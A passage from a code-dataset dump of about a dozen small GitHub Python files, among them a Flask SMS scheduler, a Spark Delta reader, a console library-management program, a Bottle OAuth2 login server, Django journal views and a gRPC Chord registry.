Your schedule is complete, you can take a look at it on our site !\",\n from_=TWILIO_PHONE, to=sendTo)\n\n sendOneMessage('+12158079223')\n\n print('SMS sent succesfully')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"CIS3296SoftwareDesignF21/prj-02-thescheduler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5363419846","text":"import pyspark\nfrom datetime import datetime\nimport json\nfrom pyspark.sql import Row,SparkSession\n\n# spark-submit --packages io.delta:delta-core_2.12:0.8.0\n\nspark = pyspark.sql.SparkSession.builder.appName(\"MyApp\") \\\n .config(\"spark.jars.packages\", \"io.delta:delta-core_2.12:0.8.0\") \\\n .config(\"spark.sql.extensions\", \"io.delta.sql.DeltaSparkSessionExtension\") \\\n .config(\"spark.sql.catalog.spark_catalog\", \"org.apache.spark.sql.delta.catalog.DeltaCatalog\") \\\n .getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\npath = \"/opt/bitnami/spark/datasets/thing_outputs_stream-extract.txt\"\ndf = spark.read.format(\"delta\").option(\"versionAsOf\", 0).load(\"file:///opt/bitnami/spark/datasets/thing_outputs_stream-delta\")\ndf.show()\n\n# create view\ndf.createOrReplaceTempView(\"thing_output_1\")\noutputs = spark.sql(\"SELECT * FROM thing_output_1 limit 100\")\n\n# The results of SQL queries are RDDs and support all the normal RDD operations.\nfor o in outputs.collect():\n print(o)\n\n# We can also use functions instead of SQL queries:\n# df.groupBy(\"age\").count().orderBy(\"age\").show()\n\nspark.stop()","repo_name":"naravitchan/apache-spark","sub_path":"src/delta-code/firehose/get-output.py","file_name":"get-output.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35657745148","text":"\"\"\"Prequential data stream evaluator.\"\"\"\r\n\r\nimport numpy as np\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom ..metrics import balanced_accuracy_score\r\n\r\n\r\nclass Prequential:\r\n\r\n\r\n def __init__(self, metrics=(accuracy_score, balanced_accuracy_score)):\r\n if isinstance(metrics, (list, tuple)):\r\n self.metrics = metrics\r\n else:\r\n self.metrics = [metrics]\r\n\r\n def process(self, stream, clfs, interval=100):\r\n\r\n # Assign parameters\r\n self.stream_ = stream\r\n self.interval_ = interval\r\n\r\n intervals_per_chunk = int(self.stream_.chunk_size / self.interval_)\r\n self.scores = np.zeros(\r\n (\r\n len(self.clfs),\r\n ((stream.n_chunks - 1) * intervals_per_chunk),\r\n len(self.metrics),\r\n )\r\n )\r\n\r\n i = 0\r\n while True:\r\n stream.get_chunk()\r\n a, _ = stream.current_chunk\r\n # break\r\n\r\n if stream.previous_chunk is not None:\r\n X_p, y_p = stream.previous_chunk\r\n X_c, y_c = stream.current_chunk\r\n\r\n X = np.concatenate((X_p, X_c), axis=0)\r\n y = np.concatenate((y_p, y_c), axis=0)\r\n\r\n for interval_id in range(1, intervals_per_chunk + 1):\r\n start = interval_id * interval\r\n end = start + self.stream_.chunk_size\r\n\r\n for clfid, clf in enumerate(self.clfs):\r\n y_pred = clf.predict(X[start:end])\r\n\r\n self.scores[clfid, i] = [\r\n metric(y[start:end], y_pred) for metric in self.metrics\r\n ]\r\n\r\n [clf.partial_fit(X[start:end], y[start:end])\r\n for clf in self.clfs]\r\n\r\n i += 1\r\n else:\r\n X_train, y_train = stream.current_chunk\r\n [\r\n clf.partial_fit(X_train, y_train, self.stream_.classes_)\r\n for clf 
in self.clfs\r\n ]\r\n\r\n if stream.is_dry():\r\n break","repo_name":"ibnudaqiqil/CMGMM","sub_path":"models/evaluator/Prequential.py","file_name":"Prequential.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72891959161","text":"class marks():\n def __init__(self,a,b):\n self.a=a\n self.b=b\n\n def __add__(self, other):\n x=self.a+other.a\n y=self.b+other.b\n z=marks(x,y)\n return z\n\n\nm1=marks(50,97)\nm2=marks(79,45)\nm3=m1+m2\nprint(m3.a+m3.b)\n","repo_name":"BAMANEBHAGYASHRI/Basic_Python","sub_path":"Oops-Pratice/Polymorphism/OpertorOverrloadingPolymorphism.py","file_name":"OpertorOverrloadingPolymorphism.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19060993851","text":"from django.core.mail import send_mail\n\nfrom .models import Profile\n\n\ndef send():\n users = Profile.objects.prefetch_related('transaction').only('email')\n for user in users:\n statistics = {}\n transactions = user.transaction.filter(user=user.id)\n for transaction in transactions:\n statistics[transaction.id] = [transaction.summa, transaction.action]\n send_mail(\n 'Statistics',\n f'There were {len(transactions)} transactions: {statistics}',\n 'some_mail',\n [user.email]\n )\n","repo_name":"VitaStain/manager","sub_path":"drf/manager/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3344112017","text":"import datetime\nimport glob\nimport os\nimport pandas as pd\n\n\ndef parse_csv(csv):\n filename = os.path.basename(csv)[:-4]\n date = datetime.datetime.strptime(filename, '%Y%m%d').date()\n df = pd.read_csv(csv, sep=',', encoding='utf-8')\n df.drop_duplicates(keep='first', inplace=True)\n df.drop(['gevraagde_faculteit', 'interesses'],\n axis=1, inplace=True, errors='ignore')\n return (date, df)\n\n\ndef merge_dfs(first, second, date):\n merged = first.merge(second, how='outer', indicator=True)\n to_add_index = merged['_merge'] == 'right_only'\n to_remove_index = merged['_merge'] == 'left_only'\n if 'removed' in merged.columns:\n not_yet_removed_index = merged['removed'].isnull()\n to_remove_index = to_remove_index & not_yet_removed_index\n merged.loc[to_add_index, 'added'] = date\n merged.loc[to_remove_index, 'removed'] = date\n merged.drop('_merge', axis=1, inplace=True)\n return merged\n\n\ndef main():\n csvs = glob.glob('data/*.csv')\n dfs = [parse_csv(csv) for csv in csvs]\n\n _, merged = dfs[0]\n for i in range(1, len(dfs)):\n date, df = dfs[i]\n merged = merge_dfs(merged, df, date)\n\n merged.to_csv('merged.csv', index=False, encoding='utf-8')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vhsven/kul-buddy-scraper","sub_path":"diffs.py","file_name":"diffs.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26716825310","text":"\n#library management(BETA)\n#created by Sankalp and Darshil\n#resources+modules suite:-\nimport urllib\nimport webbrowser\nimport time\nfrom prettytable import PrettyTable\nmembers=open('member-data.dat','w+')\nmembers1=open('member-activity.dat','w+')\nlibrary=open('library-data.dat','w+')\nbookorder=open('book-order.dat','w+')\nmember1=['darshil','saurav','kashyap','parthiv','brij']\nlibrary1=['harry potter','IDLE 
GUI','hunger games','divergent']\n#functions suite:-\ndef bookmodif(book1,book2):\n if book1 not in library1:\n print('this book does not exist at the first place.')\n else:\n library1.remove(book1)\n library1.append(book2)\n library.writelines(book2)\ndef passwordcheck(ID, password):\n if ID=='sankalp' and password==1312:\n return True\n elif ID=='darshil' and password==1234:\n return True\n elif ID=='pradeep sir' and password==1729:\n return True\n elif ID=='Kashyap' and password==4209:\n return True\n else:\n return False\ndef membercheck(user1):\n if user1 in member1:\n members1.write(user1)\n else:\n print('you are not a member yet.')\ndef bookindividual(g,g1,g2):\n fileopen1=open(g+',dat','w')\n elements1=('bookname:'+str(g)+'\\n'+'author name:'+str(g1)+'\\n'+'publisher name:'+str(g2)+'\\n')\n fileopen1.writelines(elements1)\n fileopen1.close()\ndef memberindividual(b,bb,bbb):\n fileopen=open(g+'.dat','w')\n elements=('member name:-'+str(b)+'\\n'+'date of enrollment'+str(bb)+'\\n'+'email ID:-'+str(bbb)+'\\n')\n fileopen.writelines(elements)\n fileopen.close()\ndef memberadd(a,aa,aaa):\n bce=('member name:-'+str(a)+'\\n'+'date of enrollment'+str(aa)+'\\n'+'email ID:-'+str(aaa)+'\\n') \n members.writelines(bce)\n member1.append(a)\ndef memberdel(b): \n mem1=open('member-data.dat','r')\n bbb=mem1.readlines()\n mem2=open('member-data.dat','w')\n z5=len(bbb)\n for c5 in range(z5):\n f5=bbb[c5]\n mem2.writelines(f5)\ndef bookissue(c):\n lib1=open('library-data.dat','r')\n read11=lib1.readlines()\n lib3=open('library-data.dat','w')\n z=len(read11)\n for c in range(z):\n f=read11[c]\n lib3.writelines(f)\ndef bookreturn(d):\n lib1=open('library-data.dat','r')\n read12=lib1.readlines()\n lib2=open('library-data.dat','w')\n z1=len(read12)\n for c1 in range(z1):\n f1=read12[c1]\n lib2.writelines(f1)\ndef bookadd(f,f1,f2):\n abc=('bookname:'+str(f)+'\\n'+'author name:'+str(f1)+'\\n'+'publisher name:'+str(f2)+'\\n') \n library.writelines(abc)\n library1.append(f) \ndef bookremove(g):\n lib1=open('library-data.dat','r')\n read14=lib1.readlines()\n lib14=open('library-data.dat','w')\n z4=len(read14)\n for c4 in range(z4):\n f4=read14[c4]\n lib14.writelines(f4)\ndef bookorderremove(h):\n lib1=open('book-order.dat','r')\n read13=lib1.readlines()\n lib12=open('bookorder.dat','w')\n z2=len(read13) \n for c3 in range(z2):\n f2=read13[c3] \n lib12.writelines(f2) \n#main program:- \nprint('--WELCOME TO LIBRARY MANAGEMENT SYSTEM--')\ntime.sleep(1)\nwhile True:\n t5=PrettyTable(['MAIN MENU'])\n t5.add_row(['1. Initiate program'])\n t5.add_row(['2. Exit program'])\n t5.add_row(['3. View credits'])\n t5.add_row(['4. 
update database online'])\n print(t5)\n time.sleep(1)\n masteroption=int(input('choose(1-4):'))\n if masteroption==1:\n time.sleep(1)\n t4=PrettyTable(['SNo.','options'])\n t4.add_row(['1.','Librarian'])\n t4.add_row(['2.','Member'])\n print(t4)\n time.sleep(1)\n hello=int(input('choose any one(1-2):-'))\n if hello==1:\n while True:\n ID=(input('Enter user ID:-'))\n PASSWORD=int(input('enter Password:-'))\n a12=passwordcheck(ID,PASSWORD)\n time.sleep(1)\n if a12==True:\n print('access granted')\n break\n else:\n time.sleep(1)\n print('user ID or password incorrect.')\n continue\n t1=PrettyTable(['SNo.','Options'])\n t1.add_row(['1.','Add/Remove/Edit a book'])\n t1.add_row(['2.','Issue a book(as a member)'])\n t1.add_row(['3.','Return a book(as a member)'])\n t1.add_row(['4.','Reserve a book(as a member)'])\n t1.add_row(['5.','Add a new member/Cancel membership'])\n t1.add_row(['6.','view member activity'])\n t1.add_row(['7.','change to member'])\n t1.add_row(['8.','update database online'])\n print(t1)\n time.sleep(1)\n while True:\n choice1=int(input('select your option(1-7):'))\n if choice1==1:\n time.sleep(1)\n t2=PrettyTable(['S.No','choice'])\n t2.add_row(['1.','Add a book to the Database'])\n t2.add_row(['2.','Remove a book from Database'])\n t2.add_row(['3.','Edit book info'])\n print(t2)\n while True:\n time.sleep(1)\n choice12=int(input('Choose an option(1-3):'))\n while True:\n if choice12==1:\n time.sleep(1)\n bookname=(input('enter the name of book:'))\n bookauthor=(input('enter the name of author:'))\n bookpublish=(input('enter the name of publishing house:'))\n bookadd(bookname,bookauthor,bookpublish)\n bookindividual(bookname,bookauthor,bookpublish)\n choice13=str(input('modifications complete(Y/N):'))\n if choice13=='y' or choice13=='Y':\n break\n else:\n continue\n elif choice12==2:\n time.sleep(1)\n bookname=(input('enter the name of book:'))\n bookremove(bookname)\n choice14=(input('modifications complete(Y/N):'))\n if choice14=='y' or choice14=='Y':\n break\n else:\n continue\n elif choice12==3:\n time.sleep(1)\n bookname=str(input('enter the name of book:'))\n bookname1=str(input('enter the modification of the book'))\n bookmodif(bookname,bookname1)\n choice15=str(input('modifications complete(Y/N):'))\n if choice15=='y' or choice15=='Y':\n print(library1)\n break\n else:\n continue\n time.sleep(1)\n choice16=str(input('final modification(Y/N):'))\n if choice16=='y' or choice16=='Y':\n break\n else:\n continue\n elif choice1==2:\n time.sleep(1) \n while True:\n bookissue1=str(input('what book would you like to issue?:'))\n if bookissue1 in library1:\n time.sleep(1)\n print('you have issued the book',bookissue1)\n bookissue(bookissue1)\n break\n elif bookissue1 not in library1:\n time.sleep(1)\n print('sorry! book not available')\n break\n else:\n time.sleep(1)\n print('error 505! 
book not found.')\n continue\n elif choice1==3:\n time.sleep(1)\n bookret=str(input('what book do you want to return:'))\n bookreturn(bookret)\n elif choice1==4:\n time.sleep(1)\n bookreser=str(input('what book would you like to reserve:'))\n bookorder(bookreser)\n elif choice1==5:\n time.sleep(1)\n t6=PrettyTable(['SNo.','choice'])\n t6.add_row(['1.','add a member'])\n t6.add_row(['2.','delete a member'])\n print(t6)\n option5=(input('choose command(1-2):'))\n if option5==1:\n while True:\n user1=(input('enter member name:'))\n DOE=(input('enter date of enrollment:')) \n emailID=(input('enter email-ID:-'))\n memberadd(user1,DOE,emailID)\n memberindividual(user1,DOE,emailID)\n choice152=('would you like to add more members?(Y/N):')\n if choice152=='y' or choice152=='Y':\n continue\n else:\n break\n elif choice15==2:\n user2=(input('enter member name:'))\n memberdel(user2)\n print(user2,' has been deleted.')\n choice153=('would you like to delete more members?(Y/N):')\n if choice153=='y' or choice153=='Y':\n continue\n else:\n break\n choice5=(input('final modification?(Y/N):'))\n if choice5=='y' or choice5=='Y':\n continue\n else:\n break\n elif choice1==6:\n a=members1.readlines()\n print(a)\n break\n elif choice1==7:\n break\n elif choice1==8:\n Weburl=urllib.request.urlopen('http://127.0.0.1:8000/data/')\n URL=Weburl.geturl()\n webbrowser.open_new(URL)\n elif hello==2:\n user=(input('hello there, fellow member. please input your name:'))\n if user in member1:\n membercheck(user)\n time.sleep(1)\n print('Hello,',user,'what would you like to do?:')\n t3=PrettyTable(['S.No','choice'])\n t3.add_row(['1.','Issue a book'])\n t3.add_row(['2.','Return a book'])\n t3.add_row(['3.','Reserve a book'])\n t3.add_row(['4.','Cancel membership'])\n print(t3)\n time.sleep(1)\n choice7=int(input('what would you like to do?(1-4):'))\n while True:\n if choice7==1:\n time.sleep(1)\n bookissue1=str(input('what book would you like to issue?:'))\n if bookissue1 in library1:\n time.sleep(1)\n print('you have issued the book',bookissue1)\n bookissue(bookissue1)\n break\n elif bookissue1 not in library1:\n time.sleep(1)\n print('sorry! book not available')\n break\n else:\n time.sleep(1)\n print('error 505! 
book not found.')\n continue\n elif choice7==2:\n time.sleep(1)\n bookret=(input('what book do you want to return:'))\n bookremove(bookret)\n print('thank you for returning your book on time.')\n break\n elif choice7==3:\n time.sleep(1)\n bookreser=(input('what book would you like to reserve:'))\n bookorder(bookreser)\n break\n elif choice7==4:\n time.sleep(1)\n prompt=(input('are you sure you want to cancel membership?(Y/N):'))\n if prompt=='Y' or prompt=='y':\n memberdel(user)\n time.sleep(1)\n print('thank you for your time!')\n break\n time.sleep(1)\n elif masteroption==2:\n print('Thank you for your time!')\n break\n elif masteroption==3:\n print('program developed in year 2019 by Darshil &Sankalp(KVR)')\n break\n elif masteroption==4:\n\n Weburl=urllib.request.urlopen('http://127.0.0.1:8000/data/')\n URL=Weburl.geturl()\n webbrowser.open_new(URL)\n\n","repo_name":"Darshil-Solanki/library_management","sub_path":"LIB MANAGEMENT 4.py","file_name":"LIB MANAGEMENT 4.py","file_ext":"py","file_size_in_byte":14246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33242033695","text":"from bottle import route, run, redirect, request\nimport json\nimport requests\nfrom config import *\n\n@route('/oauth2/login')\ndef login():\n querystring = \"response_type=code&client_id=\"+CLIENT_ID+\"&redirect_uri=\"+REDIRECT_URI\n\n redirect(URL_AUTHORIZATION+querystring)\n\n@route('/oauth2/callback')\ndef callback():\n acessCode = request.query.get('code')\n \n getToken(acessCode)\n\ndef getToken(code):\n payload = {\n \"grant_type\":\"authorization_code\",\n \"client_id\":CLIENT_ID,\n \"client_secret\":CLIENT_SECRET,\n \"redirect_uri\":REDIRECT_URI,\n \"code\":code\n }\n\n headers = {\n 'content-type': 'application/json'\n }\n\n response = requests.request(\"POST\", URL_GET_TOKEN, data=json.dumps(payload), headers=headers)\n\n retorno = json.loads(response.text)\n\n token = retorno['access_token']\n\n print(token)\n\nrun(host='localhost', port=8000)\n","repo_name":"DisruptivaLabs/Oauth2","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3544100064","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport networkx as nx\n\nif __name__ == '__main__':\n data = pd.read_csv(\"verkosto.csv\")\n G = nx.from_pandas_edgelist(data, \"lahto\", \"tulo\")\n centrality = nx.degree_centrality(G)\n eigen_centrality = nx.eigenvector_centrality(G)\n closeness = nx.closeness_centrality(G)\n betweenness_centrality = nx.betweenness_centrality(G)\n results = pd.DataFrame({\n \"keskeisyys\": centrality,\n \"ominaisvektorikeskeisyys\": eigen_centrality, \n \"läheisyyskeskeisyys\": closeness, \n \"välillisyyskeskeisyys\": betweenness_centrality,\n })\n results.to_csv(\"keskeisyys.csv\")\n maksimit = {c: results[c].idxmax() for c in results.columns}\n print(maksimit)\n print(f\"keskus: {nx.center(G)}\")\n print(f\"periferia: {nx.periphery(G)}\")\n print(f\"tiheys: {nx.density(G):.2f}\")\n print(f\"tärkein klikki: {nx.max_weight_clique(G, weight=None)} (Huom! 
Näitä voi olla useita)\")\n nx.draw_networkx(G, with_labels=True)\n plt.show()\n","repo_name":"AnttiHaerkoenen/laadulliset","sub_path":"data/lasku.py","file_name":"lasku.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73709572919","text":"from django.shortcuts import render, get_object_or_404, redirect, reverse\n\nfrom .forms import JournalEntryForm\nfrom .models import Journal\nfrom users.models import CustomUser\n\n\n# display all of the user's journal entries\ndef journal_dashboard(request):\n journal_entries = Journal.objects.filter(author=request.user).order_by('-entry_date')\n context = {\n 'journal_entries': journal_entries,\n }\n return render(request, 'journal/journal_dashboard.html', context)\n\n\n# single journal entry\ndef journal(request, pk):\n journal = get_object_or_404(Journal, slug=pk)\n\n form = JournalEntryForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.instance.user = request.user\n form.instance.journal = journal\n form.save()\n return redirect(reverse('journal-detail', kwargs={\n 'pk': pk\n }))\n context = {\n 'form': form,\n 'journal': journal,\n }\n return render(request, 'journal/journal.html', context)\n\n# create journal entry\ndef journal_create(request):\n title = 'Create'\n instance = Journal(author=request.user)\n form = JournalEntryForm(instance=instance)\n #author = CustomUser.objects.filter(username=request.user.username)\n if request.method == 'POST':\n form = JournalEntryForm(request.POST or None, \n request.FILES or None)\n if form.is_valid():\n form.instance.author = request.user\n form.save()\n return redirect(reverse('journal-detail', kwargs={\n 'pk': form.instance.slug\n }))\n context = {\n 'title': title,\n 'form': form,\n }\n return render(request, 'journal/journal_create_form.html', context)\n\ndef journal_update(request, pk):\n title = 'Update'\n journal = get_object_or_404(Journal, pk=pk)\n form = JournalEntryForm(request.POST or None, request.FILES or None, instance=journal)\n author = request.user\n if request.method == 'POST':\n if form.is_valid():\n form.instance.author = author\n form.save()\n return redirect(reverse('journal-detail', kwargs={\n 'pk': form.instance.slug\n }))\n context = {\n 'title': title,\n 'form': form\n }\n return render(request, 'journal/journal_create_form.html', context)\n\ndef journal_delete(request, pk):\n journal = get_object_or_404(Journal, pk=pk)\n journal.delete()\n return redirect(reverse('journal-list'))\n\n","repo_name":"QodeBroJim/goal-tracking","sub_path":"journal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33319548732","text":"\"\"\"\n给定一个二叉树,其中所有的右节点要么是具有兄弟节点(拥有相同父节点的左节点)的叶节点,要么为空,\n将此二叉树上下翻转并将它变成一棵树, 原来的右节点将转换成左叶节点。返回新的根。\n\n例子:\n\n输入: [1,2,3,4,5]\n\n 1\n / \\\n 2 3\n / \\\n4 5\n\n输出: 返回二叉树的根 [4,5,2,#,#,3,1]\n\n 4\n / \\\n 5 2\n / \\\n 3 1 \n\n\n\n\n解题思路:\n翻转的形式一开始不是很清楚,但是discuss里面的高票答案给了一个很好的解释。看例子,树的左边最深的底层是4,\n4是新的root。对于每个root node,将链接右孩子的指针去掉,将root node变为当前左孩子的left node\n,root node成为左孩子的right node。\n\n 1\n / x\n 2 -- 3\n / x\n4 -- 5\n^\nnew root\n\"\"\"\n\nclass Solution:\n def upsideDownBinaryTree(self, root):\n # 递归\n parent, parent_right = None, None\n while root:\n l = root.left\n root.left = parent_right\n parent_right = root.right\n root.right = parent\n parent = root\n root = l\n return 
parent","repo_name":"WyAzx/Leetcode-Fighting","sub_path":"code/python/156.upsideDownBinaryTree.py","file_name":"156.upsideDownBinaryTree.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3586451491","text":"# 2023/04/04 Baek 2531\n\n# 시간초과 풀이\n# import sys\n# input = sys.stdin.readline\n\n# N, d, k, c = list(map(int, input().split()))\n\n# numbers = []\n# for _ in range(N):\n# numbers.append(int(input()))\n\n# numbers += numbers[:-1]\n\n# result = k\n# for start in range(N):\n# temp = set([c])\n# for j in range(start, start + k):\n# temp.add(numbers[j])\n\n# result = max(result, len(temp))\n\n# print(result)\n\n# k크기의 구간에서 쿠폰에 있는 값이 있거나 중복되는값이 하나라도 있으면 반복을 고려 x\nimport sys\ninput = sys.stdin.readline\n\nN, d, k, c = list(map(int, input().split()))\n\nnumbers = []\nfor _ in range(N):\n numbers.append(int(input()))\n\nnumbers += numbers[:-1]\n\nresult = 0\n\nfor start in range(N):\n temp = set(numbers[start:start + k] + [c])\n result = max(result, len(temp))\n # 최대 먹을 수 있는 초밥 수 k + 1\n if result == k + 1:\n break\n\nprint(result)\n","repo_name":"kkw2758/Algorithm","sub_path":"투포인터/baek_2531.py","file_name":"baek_2531.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38223986406","text":"import grpc\t\nimport chord_pb2\nimport chord_pb2_grpc\nfrom concurrent import futures\nfrom sys import argv\nimport random\n\n\ndef getFromArgsRegistry(args):\n\treturn args[1].split(':')[0], int(args[1].split(':')[1]), int(args[2])\n\nipaddr = \"\"\nport = 0\nm = 0\nchord_info = {}\n\ndef getNonColision():\n\tres = int(random.uniform(0, 2**m))\n\twhile res in chord_info.keys():\n\t\tres = int(random.uniform(0, 2**m))\n\treturn res\n\ndef findNext(id, main_id):\n\tlist_id = sorted(list(chord_info.keys()))\n\tfor _id in list_id:\n\t\tif _id >= id % 2**m:\n\t\t\treturn _id\n\tif len(list_id) > 0:\n\t\treturn sorted(list_id)[0]\n\treturn main_id\n\n\n\ndef register(ipaddr, port):\n\tif len(chord_info.keys()) < 2**m:\n\t\tid = getNonColision()\n\t\tchord_info[id] = (ipaddr, port)\n\t\treturn (id, m)\n\treturn (-1, \"Chord is full\")\n\n\ndef deregister(id):\n\tif not id in chord_info.keys():\n\t\treturn (False, f\"no {id} in chord\")\n\tdel chord_info[id]\n\treturn (True, f\"successful deregister {id}\")\n\n\ndef populate_finger_table(id):\n\tfinger_ids = {}\n\tfor i in range(m):\n\t\tfinger_ids[findNext((id + 2 ** i) % (2**m), id)] = i\n\n\tif id in finger_ids:\n\t\tdel finger_ids[id]\n\n\tresult_list = []\n\tfor _id in finger_ids.keys():\n\t\tresult_list.append((_id, f\"{chord_info[_id][0]}:{chord_info[_id][1]}\"))\n\tthis_id_pos = -1\n\tlist_id = sorted(list(chord_info.keys()))\n\tfor _id in range(len(list_id)):\n\t\tif list_id[_id] == id:\n\t\t\tthis_id_pos = _id\n\t\t\tbreak\n\tprocess_id = list_id[(this_id_pos - 1 + len(list_id)) % len(list_id)]\n\treturn process_id, result_list\n\n\ndef get_chord_info():\n\tresult = []\n\tfor id in chord_info.keys():\n\t\tresult.append((id, f\"{chord_info[id][0]}:{chord_info[id][1]}\"))\n\treturn result\n\nclass ServiceHandler(chord_pb2_grpc.RegistryServicer):\n\tdef Register(self, request, context):\n\t\tdata = register(request.ipaddr, request.port)\n\t\tresponse = chord_pb2.ResponseRegister()\n\t\tresponse.done = data[0]\n\t\tresponse.message = str(data[1])\n\t\treturn response\n\n\tdef Deregister(self, request, context):\n\t\tdata = 
deregister(request.id)\n\t\tresponse = chord_pb2.ResponseDeregister()\n\t\tresponse.done = data[0]\n\t\tresponse.message = data[1]\n\t\treturn response\n\n\tdef PopulateFingerTable(self, request, context):\n\t\tdata = populate_finger_table(request.id)\n\t\tresponse = chord_pb2.ResponsePopulateFingerTable()\n\t\tresponse.id = data[0]\n\t\tfor sub_data in data[1]:\n\t\t\taddress = chord_pb2.Address()\n\t\t\taddress.id = sub_data[0]\n\t\t\taddress.addr = sub_data[1]\n\t\t\tresponse.result.append(address)\n\t\treturn response\n\t\n\tdef GetChordInfo(self, request, context):\n\t\tdata = get_chord_info()\n\t\tresponse = chord_pb2.ResponseGetChord()\n\t\tfor sub_data in data:\n\t\t\taddress = chord_pb2.Address()\n\t\t\taddress.id = sub_data[0]\n\t\t\taddress.addr = sub_data[1]\n\t\t\tresponse.result.append(address)\n\t\treturn response\n\n\tdef Name(self, request, context):\n\t\tresponse = chord_pb2.Answer()\n\t\tresponse.name = \"Connected to Registry\"\n\t\treturn response\n\n\t\ndef main():\n\tglobal ipaddr, port, m\n\tipaddr, port, m = getFromArgsRegistry(argv)\n\tserver = grpc.server(futures.ThreadPoolExecutor(max_workers=8))\n\tchord_pb2_grpc.add_RegistryServicer_to_server(ServiceHandler(), server)\n\tserver.add_insecure_port(f'{ipaddr}:{port}')\n\tserver.start()\n\ttry:\n\t\tserver.wait_for_termination()\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\nShutting down\")\n\nif __name__ == '__main__':\n\trandom.seed(0)\n\tmain()\n\n\n\t","repo_name":"rkBekzat/Distributed-and-Network-Programming","sub_path":"week5/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2408196609","text":"\n\"\"\"\nPseudo Algo for Creating Attributed Grids\n\n* build a geodataframe based script (or pyshp/fiona)\n\nfor group in gdf[FIELD_NAME].unique():\n\tgroup_gdf = gdf[gdf[FIELD_NAME] == group].copy()\n\tgroup_bounds = group_gdf.bounds\n\tgroup_intersect_gdf = geodataframe_select_by_location(points_gdf, group_gdf)\n\n1) Prepare subset point data\n2) For each point subset,\n\ta) determine the bounding box extent\n\tb) use the bounding box extents to generate a local fishnet grid\n\n\"\"\"\n\nimport sys\n# 64bit anaconda architecture:\nsys.path.append(r\"C:\\Anaconda2_64bit\")\nsys.path.append(r\"C:\\Anaconda2_64bit\\Scripts\")\nsys.path.append(r\"C:\\Anaconda2_64bit\\Library\\bin\")\nsys.path.append(r\"C:\\Anaconda2_64bit\\Lib\\site-packages\")\n#---#\nimport os\nimport geopandas\nfrom geopandas.tools import sjoin\nimport pysal\nfrom pyproj import Proj, transform\nfrom pysal.weights.Distance import DistanceBand\nfrom pysal.esda.getisord import G\nimport shapely\nfrom shapely.geometry import shape, base\nfrom shapely.geometry import Polygon, Point, box, asPolygon, asPoint, MultiPoint\nfrom shapely import wkt\nimport fiona\nimport ogr, osr\nfrom osgeo import ogr, osr\nimport pandas as pd\nimport itertools\nimport numpy as np\nimport scipy\nimport math\nfrom math import log\nimport shapefile\nimport re\n\n#------------------------------------------------------------------------------------------------\n#############\n## Methods ##\n#############\n\n#---------------------------------------------\n\ndef xfrange(start, stop, step):\n # algorithm pulled from here:\n # https://github.com/DigitalGlobe/gbdxtools/blob/master/gbdxtools/catalog_search_aoi.py\n # range() but for float steps\n while start < stop:\n yield start\n start += step\n else:\n yield 
stop\n\n#---------------------------------------------\n\ndef geoms_to_shp(in_geoms, out_shp, projection):\n # algorithm pulled from here:\n # https://github.com/DigitalGlobe/gbdxtools/blob/master/gbdxtools/catalog_search_aoi.py\n\n prj_name = '{}.prj'.format(out_shp.split('.')[0])\n with open(prj_name, 'w') as prj:\n prj.write(projection)\n shp_writer = shapefile.Writer(shapefile.POLYGON)\n out_fields = [\n ['id', 'N']\n ]\n out_fields_names = [x[0] for x in out_fields]\n for name in out_fields:\n shp_writer.field(*name)\n #------------------------------\n for in_id, geom in enumerate(in_geoms, start=1):\n shp_writer.record(*[str(in_id)])\n shp_writer.poly(parts=[list(box(*geom).exterior.coords)])\n shp_writer.save(out_shp)\n\n#---------------------------------------------\ndef create_fishnet(bbox, grid_size, output_name):\n \"\"\"\n\n :param bbox: [w, s, e, n] list object\n :param grid_size: an integer in meters\n :param output_name: a string with a .shp file type ending (a full directory path)\n :return: void. Invokes geoms_to_shp() to output a shapefile to the output_name directory\n \"\"\"\n # Create Fishnet (David's Method):\n\n # Latitude: 1 deg = 110.574 km\n # Longitude: 1 deg = 111.320*cos(latitude) km\n\n # We need 5 km:\n\n # shp = shapefile.Reader(file)\n # the following metadata is from the .prj file\n us_albers_equal_area = 'PROJCS[\"USA_Contiguous_Albers_Equal_Area_Conic\",GEOGCS[\"GCS_North_American_1983\",DATUM[\"D_North_American_1983\",SPHEROID\\\n 